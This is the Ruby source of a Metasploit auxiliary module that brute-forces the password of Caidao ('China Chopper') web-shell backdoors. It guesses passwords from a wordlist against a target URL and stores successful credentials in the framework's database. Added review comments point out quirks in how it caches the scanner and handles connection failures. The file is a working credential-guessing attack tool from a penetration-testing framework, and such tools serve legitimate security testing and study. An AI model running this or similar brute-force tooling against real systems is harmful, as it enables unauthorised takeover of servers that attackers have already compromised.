##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/caidao'
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # Registers module metadata and options.
  #
  # The target is a Caidao ("China Chopper") web shell that is protected by a
  # single password and has no username, so every username-related AuthBrute
  # option is removed from the datastore at the end of this method.
  #
  # @param info [Hash] module info merged through +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chinese Caidao Backdoor Bruteforce',
        'Description' => 'This module attempts to bruteforce chinese caidao asp/php/aspx backdoor.',
        'Author' => ['Nixawk'],
        'References' => [
          ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
          ['URL', 'https://www.mandiant.com/resources/breaking-down-the-china-chopper-web-shell-part-ii'],
          ['URL', 'http://web.archive.org/web/20170214000632/https://www.exploit-db.com/docs/27654.pdf'],
          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-314A'],
          ['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
        ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    default_wordlist = File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URL that handles the login process', '/caidao.php']),
        OptPath.new('PASS_FILE', [false, 'The file that contains a list of of probable passwords.', default_wordlist])
      ]
    )

    # The shell authenticates with a password alone, so the username-side
    # options that AuthBrute/HttpClient normally expose are dropped.
    deregister_options('HttpUsername', 'HttpPassword', 'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS')
  end

  # Returns the login scanner for +ip+, building it on first use.
  #
  # NOTE(review): the scanner is memoised on the instance, so +ip+ only
  # matters for the first call on a given instance -- confirm how the Scanner
  # mixin hands hosts to module instances before relying on per-host state.
  #
  # @param ip [String] target address
  # @return [Metasploit::Framework::LoginScanner::Caidao]
  def scanner(ip)
    @scanner ||= begin
      # The LoginScanner API refuses to run without a username, so a
      # placeholder one is supplied here; report_good_cred never stores it.
      creds = build_credential_collection(
        username: 'caidao',
        password: datastore['PASSWORD']
      )

      Metasploit::Framework::LoginScanner::Caidao.new(
        configure_http_login_scanner(
          host: ip,
          port: datastore['RPORT'],
          uri: datastore['TARGETURI'],
          cred_details: creds,
          stop_on_success: datastore['STOP_ON_SUCCESS'],
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
          connection_timeout: 5,
          # Both options are deregistered in initialize, so these presumably
          # resolve to nil -- verify against the datastore semantics.
          http_username: datastore['HttpUsername'],
          http_password: datastore['HttpPassword']
        )
      )
    end
  end

  # Records a successful password as a credential core plus a login entry.
  #
  # Only the password is stored as private data; the placeholder username
  # used by #scanner is deliberately not written to the database.
  #
  # @param ip [String] target address
  # @param port [Integer] target port
  # @param result [Object] a scanner result exposing +credential+, +status+ and +proof+
  # @return the value returned by +create_credential_login+
  def report_good_cred(ip, port, result)
    service = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential = {
      module_fullname: fullname,
      origin_type: :service,
      private_data: result.credential.private,
      private_type: :password,
      **service
    }

    login = {
      core: create_credential(credential),
      last_attempted_at: DateTime.now,
      status: result.status,
      proof: result.proof,
      **service
    }

    create_credential_login(login)
  end

  # Marks the attempted password as invalid for this host and port.
  #
  # @param ip [String] target address
  # @param rport [Integer] target port
  # @param result [Object] a scanner result exposing +credential+, +status+ and +proof+
  def report_bad_cred(ip, rport, result)
    cred = result.credential
    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      private: cred.private,
      realm_key: cred.realm_key,
      realm_value: cred.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs the login scanner against +ip+ and reports each outcome.
  #
  # Note that UNABLE_TO_CONNECT is handled like INCORRECT: the password is
  # invalidated in the database even though it was presumably never checked
  # against the shell. Statuses other than the three listed are ignored.
  #
  # @param ip [String] target address
  def bruteforce(ip)
    statuses = Metasploit::Model::Login::Status

    scanner(ip).scan! do |result|
      case result.status
      when statuses::SUCCESSFUL
        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential.private}'")
        report_good_cred(ip, rport, result)
      when statuses::UNABLE_TO_CONNECT
        vprint_brute(level: :verror, ip: ip, msg: result.proof)
        report_bad_cred(ip, rport, result)
      when statuses::INCORRECT
        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential.private}'")
        report_bad_cred(ip, rport, result)
      end
    end
  end

  # Scanner entry point for one host: verifies the scanner's setup check
  # passes before starting the password guesses.
  #
  # @param ip [String] target address
  def run_host(ip)
    if scanner(ip).check_setup
      bruteforce(ip)
    else
      print_brute(level: :error, ip: ip, msg: 'Backdoor type is not support')
      nil
    end
  end
end